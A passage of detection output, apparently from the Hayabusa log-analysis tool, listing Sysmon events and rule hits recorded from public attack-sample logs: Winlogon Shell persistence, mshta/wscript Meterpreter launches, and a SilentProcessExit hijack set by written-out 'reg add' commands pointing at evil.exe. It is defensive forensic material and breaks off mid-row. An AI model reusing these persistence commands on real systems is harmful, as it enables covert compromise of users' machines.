365ABB72-BFB2-5CED-0000-0010F2C03600,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx 2019-06-15 07:22:17.988 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:21.503 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:21.535 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:31.957 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:31.957 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:32.222 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:47.253 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:52.457 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:52.503 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:55.441 +09:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:55.503 +09:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:55.566 +09:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:55.707 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:06.691 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:07.019 +09:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:07.082 +09:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.894 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.957 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.972 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:15.054 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:16.592 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:23.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:26.811 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:26.811 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:26.999 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:53.358 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 16:13:42.294 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:13:44.106 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:14:32.809 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:21:50.488 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:21:51.035 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:22:05.691 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:22:05.973 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx 2019-06-15 16:22:08.473 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx 2019-06-20 02:22:37.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:41.709 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:43.944 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:43.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:45.694 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:55.397 +09:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:58.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 